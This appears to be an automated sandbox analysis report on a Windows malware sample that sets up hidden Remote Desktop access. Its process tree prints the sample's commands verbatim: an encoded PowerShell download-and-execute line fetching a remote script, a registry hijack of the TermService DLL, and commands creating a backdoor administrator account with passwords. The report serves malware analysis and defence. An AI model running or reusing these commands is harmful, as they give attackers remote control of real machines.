Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    29-09-2021 16:05

General

  • Target

    74f029d2fd587f9e25091f7832bea2f2.exe

  • Size

    5.7MB

  • MD5

    74f029d2fd587f9e25091f7832bea2f2

  • SHA1

    76fb2d051d6dc938ba2b7131ef1b21c0fe2ad60c

  • SHA256

    5f0c0223d10468b9130a240432342f4056c6d7c2f6f89469c9d971bcea31255a

  • SHA512

    0386c61a89b414ab50c2c7b371d2bab288bde154da35c643de423622b05e99fcc748f5b0b9e53f8da00e6dccd02cf535b6d41c15fbddfa732a599db3bac45a23

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\74f029d2fd587f9e25091f7832bea2f2.exe
    "C:\Users\Admin\AppData\Local\Temp\74f029d2fd587f9e25091f7832bea2f2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2112
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2620
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2z1qaywo\2z1qaywo.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1168
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99E4.tmp" "c:\Users\Admin\AppData\Local\Temp\2z1qaywo\CSC1D3CD46C682B479DBBFE64360723EB8.TMP"
          4⤵
            PID:3176
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1128
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:984
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1856
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:1884
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:1168
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:952
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1180
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:1068
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1012
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3944
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1564
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:512
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:656
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2780
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1040
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:3908
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:1060
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:3808
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user wgautilacc Ghar4f5 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1272
                    • C:\Windows\system32\net.exe
                      net.exe user wgautilacc Ghar4f5 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:412
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                        3⤵
                          PID:1052
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user wgautilacc thjtNX1g /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1464
                      • C:\Windows\system32\net.exe
                        net.exe user wgautilacc thjtNX1g /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3344
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user wgautilacc thjtNX1g /add
                          3⤵
                            PID:664
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3912
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1340
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                            3⤵
                              PID:2692
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1180
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:912
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                              3⤵
                                PID:3284
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:692
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4052
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                3⤵
                                  PID:524
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user wgautilacc thjtNX1g
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1168
                              • C:\Windows\system32\net.exe
                                net.exe user wgautilacc thjtNX1g
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1980
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user wgautilacc thjtNX1g
                                  3⤵
                                    PID:2664
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3344
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_VideoController get name
                                  2⤵
                                    PID:1312
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C wmic CPU get NAME
                                  1⤵
                                    PID:868
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic CPU get NAME
                                      2⤵
                                        PID:3944
                                    • C:\Windows\System32\cmd.exe
                                      cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                      1⤵
                                        PID:3288
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                          2⤵
                                            PID:1196
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                              3⤵
                                              • Blocklisted process makes network request
                                              • Drops file in Program Files directory
                                              • Drops file in Windows directory
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:372
                                        • C:\Windows\System32\cmd.exe
                                          cmd.exe /C net user wgautilacc 1234
                                          1⤵
                                            PID:3048
                                            • C:\Windows\system32\net.exe
                                              net user wgautilacc 1234
                                              2⤵
                                                PID:2240
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 user wgautilacc 1234
                                                  3⤵
                                                    PID:1916

                                              Network

                                              MITRE ATT&CK Enterprise v6

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\Local\Temp\2z1qaywo\2z1qaywo.dll

                                                MD5

                                                e75bccdf363f6902a0bb91ffe6e05056

                                                SHA1

                                                8465a95edbd183b2084d63ec0c2bba1e549c39ac

                                                SHA256

                                                c49367b064eac51e2210a72585f8c903f468bdf8f1debed20f4b5516cfec8cad

                                                SHA512

                                                44bdafd9c8d3655bac610455ff7e4b7e88eda5bf67718cf8f72c10a8e1ca47e9d7ca760e29c61b8513698a15933b15e6bc34c6b9cac4d40607687609a7aea199

                                              • C:\Users\Admin\AppData\Local\Temp\RES99E4.tmp

                                                MD5

                                                cffbd3c113b5ad3e1152e1d47351aba7

                                                SHA1

                                                4eff0096a4ab76fb115c94c221707d221d59bf53

                                                SHA256

                                                4a7fb9172f8759a241c0d56297704df22b5e88b40002b816116d252b599f4ecc

                                                SHA512

                                                e4a4615ddcb165ff409f031999d0dc8254176811fb81826c16585f88cda5df70b6f3c84b055db757de40864f546a1ea04a5daeb11f2fcf2e20f727da62b4e7a1

                                              • C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

                                                MD5

                                                1ef6eef1d39c71661339d818226d688d

                                                SHA1

                                                b3e44163a9d9894d091f59f888d7d5d90e68e216

                                                SHA256

                                                dcad3e3226ea222782284a604f9354ac661cf6e34c26c62162dd1aeedfbef04a

                                                SHA512

                                                8deb2b6df79c2ce81604b9124d92c6222f517cea021416513fdd8dfc9f8d46ae464cd69f50ee70a343cfe5b4fbc4d08212bcf3e1416262193cae52b4a30b2c49

                                              • C:\Users\Admin\AppData\Local\Temp\ready.ps1

                                                MD5

                                                28d9755addec05c0b24cca50dfe3a92b

                                                SHA1

                                                7d3156f11c7a7fb60d29809caf93101de2681aa3

                                                SHA256

                                                abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

                                                SHA512

                                                891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

                                              • \??\c:\Users\Admin\AppData\Local\Temp\2z1qaywo\2z1qaywo.0.cs

                                                MD5

                                                9f8ab7eb0ab21443a2fe06dab341510e

                                                SHA1

                                                2b88b3116a79e48bab7114e18c9b9674e8a52165

                                                SHA256

                                                e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

                                                SHA512

                                                53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

                                              • \??\c:\Users\Admin\AppData\Local\Temp\2z1qaywo\2z1qaywo.cmdline

                                                MD5

                                                0fd306c72f2b4993966ce5cf8a5dd10b

                                                SHA1

                                                64b0c2355fbfdcc756738704bdf6d4c25daf7c91

                                                SHA256

                                                bd6990917973d12228ae7221446686633e8cc5a902fb9c7ae66214c3200ed3f9

                                                SHA512

                                                34a71f2f1d6123d01771767d2377ceeeb77bfddc239ee59edcdce32a119d86a541fa21d2364d2e702ecf58b8a858869b6d77ee917f2ed40481200ac2a4e97da6

                                              • \??\c:\Users\Admin\AppData\Local\Temp\2z1qaywo\CSC1D3CD46C682B479DBBFE64360723EB8.TMP

                                                MD5

                                                09e18798f9888787929079faecb5d58e

                                                SHA1

                                                1742950dc167c3bdc25f780346a6b6db402b5e9b

                                                SHA256

                                                9c495abb0ad22a304a4ff2701bb2191f48ea5c8903bfc8a1bd2105559ee36096

                                                SHA512

                                                c2d2cd30237cb4e9ae43e794f8b08f1ebbf2b4a246ce77b59f32812aad6143e43e12e742833451dcd90c220dc0433ea50b291119fc94a875b8e46f177bc9e93e

                                              • \Windows\Branding\mediasrv.png

                                                MD5

                                                44161e115bf968d5b616d254be2f38a1

                                                SHA1

                                                b801a9318b1fc89996f76055c69e071e0fed368a

                                                SHA256

                                                2750122708b726eb5e75869401dc6f3b663e8ca342924f8a713adfca86e80491

                                                SHA512

                                                375ab2fd36f9953faef09e10889535a0e8a5192c841d941998ff0f193d5b6702a26698149789f77925689c74edecb97a78382c2d2529c6ab10a47b723d3a185e

                                              • \Windows\Branding\mediasvc.png

                                                MD5

                                                7245ed7533b89d29f7f5bb35830d4560

                                                SHA1

                                                8efaef0babf855989e460451803032940ae0c7bd

                                                SHA256

                                                89549afa855d70f7bf33b1979541ab0e732c7cc16adb866efffe9d1e8be62638

                                                SHA512

                                                f19a1a72684cc54757d065133dd95122acce69744267fa49a55a5508263946953ad8bca4e2e3188e02a119948dac95a63c185d92c57f32dad51bfaa077a216f3

                                              • memory/372-388-0x0000024E19703000-0x0000024E19705000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/372-387-0x0000024E19700000-0x0000024E19702000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/372-375-0x0000000000000000-mapping.dmp

                                              • memory/372-391-0x0000024E19706000-0x0000024E19708000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/372-441-0x0000024E19708000-0x0000024E19709000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/412-360-0x0000000000000000-mapping.dmp

                                              • memory/512-353-0x0000000000000000-mapping.dmp

                                              • memory/524-369-0x0000000000000000-mapping.dmp

                                              • memory/656-354-0x0000000000000000-mapping.dmp

                                              • memory/664-363-0x0000000000000000-mapping.dmp

                                              • memory/912-366-0x0000000000000000-mapping.dmp

                                              • memory/952-309-0x0000000000000000-mapping.dmp

                                              • memory/984-215-0x00000146B21B0000-0x00000146B21B2000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/984-216-0x00000146B21B3000-0x00000146B21B5000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/984-286-0x00000146B21B8000-0x00000146B21BA000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/984-203-0x0000000000000000-mapping.dmp

                                              • memory/984-243-0x00000146B21B6000-0x00000146B21B8000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/1012-350-0x0000000000000000-mapping.dmp

                                              • memory/1040-356-0x0000000000000000-mapping.dmp

                                              • memory/1052-361-0x0000000000000000-mapping.dmp

                                              • memory/1060-457-0x0000000000000000-mapping.dmp

                                              • memory/1068-347-0x0000000000000000-mapping.dmp

                                              • memory/1128-173-0x00000267F7DC0000-0x00000267F7DC2000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/1128-214-0x00000267F7DC8000-0x00000267F7DCA000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/1128-177-0x00000267F7DC6000-0x00000267F7DC8000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/1128-174-0x00000267F7DC3000-0x00000267F7DC5000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/1128-161-0x0000000000000000-mapping.dmp

                                              • memory/1168-136-0x0000000000000000-mapping.dmp

                                              • memory/1168-308-0x0000000000000000-mapping.dmp

                                              • memory/1180-346-0x0000000000000000-mapping.dmp

                                              • memory/1196-374-0x0000000000000000-mapping.dmp

                                              • memory/1312-372-0x0000000000000000-mapping.dmp

                                              • memory/1340-364-0x0000000000000000-mapping.dmp

                                              • memory/1564-352-0x0000000000000000-mapping.dmp

                                              • memory/1856-252-0x0000000000000000-mapping.dmp

                                              • memory/1856-289-0x000002A40F9C6000-0x000002A40F9C8000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/1856-288-0x000002A40F9C3000-0x000002A40F9C5000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/1856-287-0x000002A40F9C0000-0x000002A40F9C2000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/1884-307-0x0000000000000000-mapping.dmp

                                              • memory/1916-444-0x0000000000000000-mapping.dmp

                                              • memory/1980-370-0x0000000000000000-mapping.dmp

                                              • memory/2112-115-0x000001D0DC900000-0x000001D0DCCFF000-memory.dmp

                                                Filesize

                                                4.0MB

                                              • memory/2112-119-0x000001D0DC4E5000-0x000001D0DC4E6000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/2112-120-0x000001D0DC4E6000-0x000001D0DC4E7000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/2112-118-0x000001D0DC4E3000-0x000001D0DC4E5000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/2112-117-0x000001D0DC4E0000-0x000001D0DC4E2000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/2240-443-0x0000000000000000-mapping.dmp

                                              • memory/2620-137-0x0000022C61620000-0x0000022C61622000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/2620-154-0x0000022C61628000-0x0000022C61629000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/2620-121-0x0000000000000000-mapping.dmp

                                              • memory/2620-139-0x0000022C61626000-0x0000022C61628000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/2620-127-0x0000022C61BE0000-0x0000022C61BE1000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/2620-146-0x0000022C61770000-0x0000022C61771000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/2620-138-0x0000022C61623000-0x0000022C61625000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/2620-152-0x0000022C7ACA0000-0x0000022C7ACA1000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/2620-130-0x0000022C7A7A0000-0x0000022C7A7A1000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/2620-153-0x0000022C7B030000-0x0000022C7B031000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/2664-371-0x0000000000000000-mapping.dmp

                                              • memory/2692-365-0x0000000000000000-mapping.dmp

                                              • memory/2780-355-0x0000000000000000-mapping.dmp

                                              • memory/3176-142-0x0000000000000000-mapping.dmp

                                              • memory/3284-367-0x0000000000000000-mapping.dmp

                                              • memory/3344-362-0x0000000000000000-mapping.dmp

                                              • memory/3808-458-0x0000000000000000-mapping.dmp

                                              • memory/3908-357-0x0000000000000000-mapping.dmp

                                              • memory/3944-373-0x0000000000000000-mapping.dmp

                                              • memory/3944-351-0x0000000000000000-mapping.dmp

                                              • memory/4052-368-0x0000000000000000-mapping.dmp